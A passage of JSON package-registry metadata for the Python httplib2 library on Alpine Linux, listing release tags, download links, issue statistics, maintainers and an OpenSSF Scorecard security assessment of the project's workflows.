,"published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:22:36.217Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.20","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":190,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2024-06-12T01:11:27.633Z","updated_at":"2024-06-12T01:11:27.633Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.20","url":"https://pkgs.alpinelinux.org/packages?branch=v3.20","ecosystem":"alpine","default":false,"packages_count":24162,"maintainers_count":405,"namespaces_count":2,"keywords_count":4251,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1543},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-06-07T11:51:39.915Z","updated_at":"2026-08-24T05:06:36.705Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/namespaces"}},{"id":6082464,"name":"py-httplib2","ecosystem":"alpine","description":"Python HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2019-01-21T23:15:19.000Z","latest_release_published_at":"2019-01-21T23:15:19.000Z","latest_release_number":"0.12.0-r0","last_synced_at":"2026-03-10T13:00:15.669Z","created_at":"2023-01-31T19:59:08.287Z","updated_at":"2026-08-21T14:44:29.143Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.9/main/x86_64/py-httplib2","install_command":"apk add py-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 